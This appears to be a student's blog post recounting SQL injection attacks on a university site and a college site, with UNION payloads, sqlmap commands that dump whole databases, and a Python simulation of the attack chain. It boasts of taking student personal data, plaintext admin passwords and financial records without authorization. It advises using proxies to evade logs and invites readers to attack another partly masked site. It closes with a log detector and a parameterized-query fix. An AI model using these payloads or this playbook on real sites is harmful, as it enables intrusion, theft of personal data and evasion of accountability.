How I Hacked University and My College Site

In this article, I’ll be sharing my experience of hacking university and my college site!

Shubham Sangle (mr.silent)
GDSC DYPCOE

Hey guys, I hope you are all enjoying quarantine.

“ As hacking is a buzzword for any IT student, many people really love to be part of this trend. I am also one of them. So I hacked something…. ”

If any of you are wondering which university I am talking about, let me clear it up: it's our own SPPU.

Savitribai Phule Pune University

When I was submitting my university exam form, I noticed that this site is not really good at security. If any of you noticed, session management is really poor. As every IT student does, I wanted to take a look at its source code, so I did. What I came to know is that there is a site attached to the main “SPPU” site which is still plain PHP with GET parameters.

https://****.unipune.ac.in/courses-detail.php?id=1

Just take a look at that id=1, how happy he is 😊, but all the problems start with that single parameter.

We can exploit the database behind a website using SQL injection, a well-known vulnerability class in web application penetration testing: user input that is pasted into a SQL query string becomes part of the query itself.

Basic Example

Let's consider that this id=1 parameter is passed to the SQL server without any sanitization. Where there is no sanitization there is Corona (HACK) 😅

The query will look like this on the server-side:

select * from course_detail where id=1

What if I change id=1 to id=1 or 1=1?

https://****.unipune.ac.in/courses-detail.php?id=1 or 1=1

(The browser sends the spaces as %20 and PHP decodes them again, so the value reaches the query exactly as typed.)

It looks confusing, right? But it's more interesting on the database side.

The query will look like this on the server-side:

select * from course_detail where id=1 or 1=1

Now the database executes this query. 1=1 is true for every row, so the WHERE clause matches everything and the query returns every record in the course_detail table, not just the one course we asked for.

Interesting Example

What if I do this,

https://****.unipune.ac.in/courses-detail.php?id=-1 UNION SELECT table_schema, table_name, 1 FROM information_schema.tables

id=-1 matches no course, so the page shows only the rows the UNION adds. A UNION works only when both SELECTs return the same number of columns: find the column count of course_detail by appending ORDER BY 1, ORDER BY 2, … until the page errors, then pad the UNION SELECT with constants (the 1 above) until the counts match.

union: appends the result set of a second SELECT to the first; both must return the same number of columns.

table_schema, table_name: the database name and table name of every table, as listed in information_schema.tables.

information_schema: the built-in database (in MySQL and most other servers) that describes every database, table and column the current DB user can see; information_schema.columns lists column names the same way.

What the above query basically does is retrieve all table names in the database. Now we can use those table names (and information_schema.columns for their column names) to form our attack query “select * from <table_name>” and retrieve table data.

To retrieve records from the users table we can form the query as

https://****.unipune.ac.in/courses-detail.php?id=-1 UNION SELECT username, password, 1 FROM users

(SELECT * only works here if users happens to have exactly as many columns as course_detail; naming the columns you want, taken from information_schema.columns, is the reliable form.)

Here we get some juicy info. We just retrieved all users' data from the university SQL server.
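To see the three payloads above actually run against a database, here is an added example (mine, not code from the original post or from the university's site) that simulates courses-detail.php in Python with an in-memory SQLite database. The table names, column names and rows are invented for the demonstration, and sqlite_master stands in for MySQL's information_schema.tables because SQLite has no information_schema. It also shows the ORDER BY probe used to learn how many columns the UNION has to match, which the post does not spell out.

```python
import sqlite3

# Constructed sample data standing in for the university's tables; every
# name and row here is invented for this demonstration.
COURSES = [(1, "B.E. Computer", "4 years"),
           (2, "B.E. IT", "4 years"),
           (3, "M.Sc. Physics", "2 years")]
USERS = [("admin", "Summer2020!", "admin@example.invalid"),
         ("registrar", "pune123", "registrar@example.invalid")]


def build_db() -> sqlite3.Connection:
    """In-memory database with the two tables the article talks about."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE course_detail (id INTEGER, name TEXT, duration TEXT)")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, email TEXT)")
    conn.executemany("INSERT INTO course_detail VALUES (?, ?, ?)", COURSES)
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, id_param: str) -> list:
    """Mimics courses-detail.php: the raw ?id= value is pasted into the SQL text."""
    query = f"SELECT * FROM course_detail WHERE id={id_param}"
    return conn.execute(query).fetchall()


def find_column_count(conn: sqlite3.Connection, max_cols: int = 20) -> int:
    """Learn how many columns course_detail has by appending ORDER BY n.

    ORDER BY n is accepted while n <= number of selected columns and raises
    an error as soon as it is one too many; the last good n is the count.
    """
    for n in range(1, max_cols + 1):
        try:
            vulnerable_lookup(conn, f"1 ORDER BY {n}")
        except sqlite3.OperationalError:
            return n - 1
    raise RuntimeError("column count exceeds max_cols")


def union_payload(columns: list, table: str, ncols: int, where: str = "") -> str:
    """Build '-1 UNION SELECT <columns>, 1, 1, ... FROM <table>' padded to ncols.

    -1 matches no real course, so only the rows the UNION adds come back.
    """
    padding = ["1"] * (ncols - len(columns))
    select_list = ", ".join(list(columns) + padding)
    return f"-1 UNION SELECT {select_list} FROM {table}{where}"


def list_tables(conn: sqlite3.Connection, ncols: int) -> list:
    """Enumerate table names through the injection.

    sqlite_master plays the role MySQL's information_schema.tables plays in
    the article; on MySQL the payload would read
    -1 UNION SELECT table_schema, table_name, 1 FROM information_schema.tables
    """
    payload = union_payload(["type", "name"], "sqlite_master", ncols, " WHERE type='table'")
    return sorted(row[1] for row in vulnerable_lookup(conn, payload))


def dump_users(conn: sqlite3.Connection, ncols: int) -> list:
    """Pull username/password pairs out of the users table through the injection."""
    payload = union_payload(["username", "password"], "users", ncols)
    return sorted((row[0], row[1]) for row in vulnerable_lookup(conn, payload))


if __name__ == "__main__":
    db = build_db()
    print("normal:  ", vulnerable_lookup(db, "1"))
    print("or 1=1:  ", vulnerable_lookup(db, "1 or 1=1"))
    n = find_column_count(db)
    print("columns: ", n)
    print("tables:  ", list_tables(db, n))
    print("users:   ", dump_users(db, n))
```

The padding constants in union_payload are the same trick as the trailing 1 in the article's payload; on a real target you would also have to check which of the UNION'd columns the page actually renders, since only those carry data back to you.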

Tooling UP

We can do this type of attack from Android or Linux. I am using DroidSQLi on Android.

Android Tool: DroidSQLi

Linux Tool: SQLMap

Copy the link from the browser, paste it into “DroidSQLi” and just click Inject; it starts attacking the SQL database. This type of attack really makes noise in the web server and database logs, and your IP address is stored in those logs too, along with every payload you sent and the tool's User-Agent. So, just to be on the safer side, use proxies when you are attacking something that doesn't belong to you.
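The noise those tools make is exactly what a defender looks for. As an added example (not from the original post), this Python snippet parses a few constructed Apache combined-format access-log lines, URL-decodes the request path and flags the classic SQL injection tell-tales (UNION SELECT, or 1=1, information_schema) together with sqlmap's default User-Agent. The IPs, timestamps and paths are made up for the demonstration.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format lines: two normal hits, then the two
# payloads from the article sent by a second (invented) address, the last
# one with sqlmap's default User-Agent.
SAMPLE_LOG = """\
203.0.113.7 - - [10/May/2020:10:01:02 +0530] "GET /courses-detail.php?id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/May/2020:10:01:09 +0530] "GET /courses-detail.php?id=2 HTTP/1.1" 200 5098 "-" "Mozilla/5.0"
198.51.100.23 - - [10/May/2020:10:05:41 +0530] "GET /courses-detail.php?id=1%20or%201%3D1 HTTP/1.1" 200 40211 "-" "Mozilla/5.0"
198.51.100.23 - - [10/May/2020:10:05:52 +0530] "GET /courses-detail.php?id=-1%20UNION%20SELECT%20table_schema%2Ctable_name%2C1%20FROM%20information_schema.tables HTTP/1.1" 200 7731 "-" "sqlmap/1.4.5#stable (http://sqlmap.org)"
"""

# Combined log format: ip ident user [time] "method path proto" status bytes "referer" "user-agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d+) (?P<bytes>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)

# Each sign is matched against the URL-decoded path, so %20/%3D tricks do not hide it.
SQLI_SIGNS = [
    ("union select", re.compile(r"\bunion\b[\s\S]*?\bselect\b", re.I)),
    ("tautology", re.compile(r"\b(or|and)\b\s+\d+\s*=\s*\d+", re.I)),      # or 1=1
    ("quote break", re.compile(r"['\"]\s*(or|and)\b", re.I)),                # ' or 'a'='a
    ("schema probe", re.compile(r"information_schema|sqlite_master", re.I)),
    ("time-based", re.compile(r"\b(sleep|benchmark|waitfor)\b", re.I)),
]
SCANNER_UA = re.compile(r"sqlmap", re.I)


def parse_line(line: str):
    """Return the log fields as a dict, or None for a line that is not in the expected format."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def classify(entry: dict) -> list:
    """List the injection indicators present in one parsed entry (empty means clean)."""
    decoded = unquote_plus(entry["path"])
    reasons = [label for label, pattern in SQLI_SIGNS if pattern.search(decoded)]
    if SCANNER_UA.search(entry["ua"]):
        reasons.append("scanner user-agent")
    return reasons


def scan_log(text: str) -> list:
    """Return (client ip, decoded path, reasons) for every suspicious request in the log text."""
    hits = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            hits.append((entry["ip"], unquote_plus(entry["path"]), reasons))
    return hits


if __name__ == "__main__":
    for ip, path, reasons in scan_log(SAMPLE_LOG):
        print(f"{ip}  {path}  <- {', '.join(reasons)}")
```

Decoding before matching is the important step: the same payload arrives percent-encoded, plus-encoded or double-encoded depending on the tool, and a pattern applied to the raw line misses most of them. In practice you would also group hits by client IP over a time window, since one tautology probe is curiosity and two hundred requests in a minute is a scanner.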

Pro Tip: Guys, why hand-written PHP? There are lots of frameworks you can use, like Django (personal favorite) for Python or Laravel for PHP itself, whose ORMs parameterize queries by default and give you much better security mechanisms than raw query strings.

What happened next? I mailed them the vulnerability, but they were not even interested in taking a look at it. So, just to make them realize what I could do, I sent them their admin username and password by mail.

In the next 10 minutes, I got a reply… “Can we meet?”

And at the next moment I was the happiest person on earth, because they called me to fix their servers, and this is how my journey started.

How I hacked My College Site

When I was digging around my old college site, I saw that this site is also a PHP site, but it's hard to find a GET parameter there. So I used our good old friend “GOOGLE”. We can use Google dorks to find PHP pages where GET parameters are present.

Google hacking

Google hacking, also called Google dorking, is a technique that uses Google Search and other Google applications to find security holes in the configuration and code that websites use, by searching for tell-tale URLs, file types and error messages that Google has already indexed.

Google Dork: site:website.org inurl:event=

It returns Google's indexed pages on that site whose URL contains that GET parameter (inurl:.php?id= is the generic form). But I found this one interesting.

https://www.****.org/event.php?event_id=12

Now you know what to do with this URL.

Basic Hacks

But this time let's try with sqlmap (Linux tool).

$ sqlmap -u "https://www.****.org/event.php?event_id=39" -p event_id --current-user
  • -u URL: the URL to test, with the parameter in it (quoted so the shell does not interpret ? or &).
  • -p event_id: the parameter we want to test.
  • --current-user: retrieve the database user the web application connects as.

Here we retrieve the current database user just to check whether the parameter is really injectable. If we get a value back, the injection works and we are ready to hack further.

Towards Great Hack

How to hack everything

$ sqlmap -u "https://www.****.org/event.php?event_id=39" -p event_id --dump-all

--dump-all: dump every table of every database the site's DB user can read, all through that one injection point.

So what did I get in this attack? Just about everything you can think of.

  • All student information, containing college usernames, passwords, contact numbers, branch, email id, DOB (so I can wish all of them)
  • Admin passwords (stored unencrypted)
  • Their fees databases (I can pay more fees to those students than government)
  • Hostel logins and fees databases
  • Admission Database
  • Students Internal mark database
  • Alumni Data
  • Teachers' payment database (they really get paid well)

As every good hacker does, I mailed this vulnerability to my college. I hope they have fixed it, else next year someone will get free admission and hostel. Maybe some “teachers” will get a salary increment.

How to protect your code from SQL Injection?

  1. Never build a query by concatenating the user's input into the SQL string. Use parameterized statements (prepared statements) instead: the SQL text is sent with placeholders and the values travel separately, so the database treats them as data and never as SQL, whatever they contain.

/* SQL query vulnerable to SQL injection: $id is pasted into the SQL text */
$sql = "SELECT username FROM users WHERE id = $id";

  2. It is always good to validate the user input as well: an id must be an integer, a name can't be digits, a phone number can't be letters. Validation limits the damage a bug can do and keeps garbage out of the database, but filters can be bypassed, so it complements parameterization and never replaces it.

/* Rewritten: validate the input, then bind it as a parameter of a prepared statement (PDO) */
/* is_numeric() also accepts "1.5" and "1e3"; for an integer id, filter_var($contact, FILTER_VALIDATE_INT) is stricter */
if (is_numeric($contact)) {
    $q = "SELECT username FROM users WHERE id = :contact";
    $sth = $dbh->prepare($q);
    $sth->bindParam(':contact', $contact, PDO::PARAM_INT);
    $sth->execute();
    $result = $sth->fetchColumn();
}

  3. Use a database layer that parameterizes queries for you, such as PDO in PHP or SQLAlchemy in Python, and stay away from its raw-SQL escape hatches. An ORM protects only the queries it builds; a string you assemble yourself and hand to it is just as injectable as the first PHP snippet above.
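The same fix in Python, as an added example rather than the post's own code: the input is validated against a digits-only allow-list and passed to the database as a bound parameter, so the payloads from the first half of the article return nothing. The course table and rows are invented; the module mirrors the PHP above, with the strict integer check the text recommends in place of is_numeric().

```python
import re
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed course table; the rows are invented for the demonstration."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE course_detail (id INTEGER, name TEXT)")
    conn.executemany("INSERT INTO course_detail VALUES (?, ?)",
                     [(1, "B.E. Computer"), (2, "B.E. IT"), (3, "M.Sc. Physics")])
    return conn


# Allow-list for a course id: 1..999999999, ASCII digits only, no sign, no leading zero.
_ID_RE = re.compile(r"[1-9][0-9]{0,8}")


def parse_id(raw) -> int:
    """Strict validation, the Python counterpart of FILTER_VALIDATE_INT:
    anything that is not a plain positive integer is rejected before it
    gets anywhere near the database."""
    if not isinstance(raw, str) or not _ID_RE.fullmatch(raw):
        raise ValueError(f"invalid course id: {raw!r}")
    return int(raw)


def safe_lookup(conn: sqlite3.Connection, raw_id: str) -> list:
    """Validated input bound through the '?' placeholder.
    The SQL text is fixed; the value is shipped separately and never parsed as SQL."""
    course_id = parse_id(raw_id)
    return conn.execute("SELECT id, name FROM course_detail WHERE id = ?",
                        (course_id,)).fetchall()


def parameterized_only(conn: sqlite3.Connection, raw_id: str) -> list:
    """Parameterized but unvalidated, to show that binding alone already
    defeats the injection: the payload is compared as a literal string and
    matches no id. Validation on top gives a clear error instead of silence."""
    return conn.execute("SELECT id, name FROM course_detail WHERE id = ?",
                        (raw_id,)).fetchall()


def lookup_or_none(conn: sqlite3.Connection, raw_id: str):
    """Convenience wrapper: None when validation rejects the input."""
    try:
        return safe_lookup(conn, raw_id)
    except ValueError:
        return None


# The article's payloads plus a stacked-query attempt; all are harmless here.
PAYLOADS = [
    "1 or 1=1",
    "-1 UNION SELECT name, 1 FROM sqlite_master",
    "1; DROP TABLE course_detail",
]


def table_intact(conn: sqlite3.Connection) -> bool:
    """True while course_detail still exists with all three rows."""
    return len(conn.execute("SELECT * FROM course_detail").fetchall()) == 3


if __name__ == "__main__":
    db = build_db()
    print("id=2:", safe_lookup(db, "2"))
    for p in PAYLOADS:
        print(repr(p), "-> validated:", lookup_or_none(db, p),
              "| bound as literal:", parameterized_only(db, p))
    print("table intact:", table_intact(db))
```

The two lookup functions make the division of labour visible: the bound parameter is what stops the injection, and the allow-list is what turns a silent empty result into a rejected request you can log and alert on.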

Conclusion

Thanks for reading

I hope you liked my article on “How I Hacked University and My College Site”. I really enjoy the way I hack; it's a lot of fun for me.

So what would you do if you found something like this next time?

http://www.*a*er*.org/index.php?id=1

DM me on Twitter or drop a response below if you have hacked any site using any other vulnerability. I would love to hear it.

Just remember there is no place like 127.0.0.1. Stay home, stay safe.

So, this was my experience! Hope you all enjoyed that!

If you found this interesting then share it with everyone!

Thank you! 😃


HACKER™ | Altruistic | Google Certified Automation Engineer.